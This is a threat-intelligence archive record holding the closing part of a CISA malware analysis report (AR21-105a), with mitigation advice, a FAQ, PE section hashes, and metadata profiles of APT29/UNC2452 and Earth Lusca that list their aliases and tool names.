If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. 
To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to CISA at 1-844-Say-CISA or CISA Central.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nc986ba8e4a156864e2afff2732285838 header 1536 1.243612\r\n4a26b87fa44a548f2d6d6a3d2cf09fb2 .text 2284544 5.911172\r\n46e1b5a3734e729d9bdce0a14120c910 .rdata 2400768 5.329403\r\n952ce42dcbf61c3fac54c2c958e0c551 .data 259072 5.567652\r\n52887da2b4d17327b2d67732484c11c2 .idata 1536 2.877795\r\nPage 4 of 44\r\nMD5 Name Raw Size Entropy\r\n657af7f5c4c96b7699b37a285b3bb95d header 512 2.462581\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\nPage 7 of 44",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a"
	],
	"report_names": [
		"ar21-105a"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434174,
	"ts_updated_at": 1775826693,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ae59e3a21c3da214423167f397d741426dbfd9c3.pdf",
		"text": "https://archive.orkl.eu/ae59e3a21c3da214423167f397d741426dbfd9c3.txt",
		"img": "https://archive.orkl.eu/ae59e3a21c3da214423167f397d741426dbfd9c3.jpg"
	}
}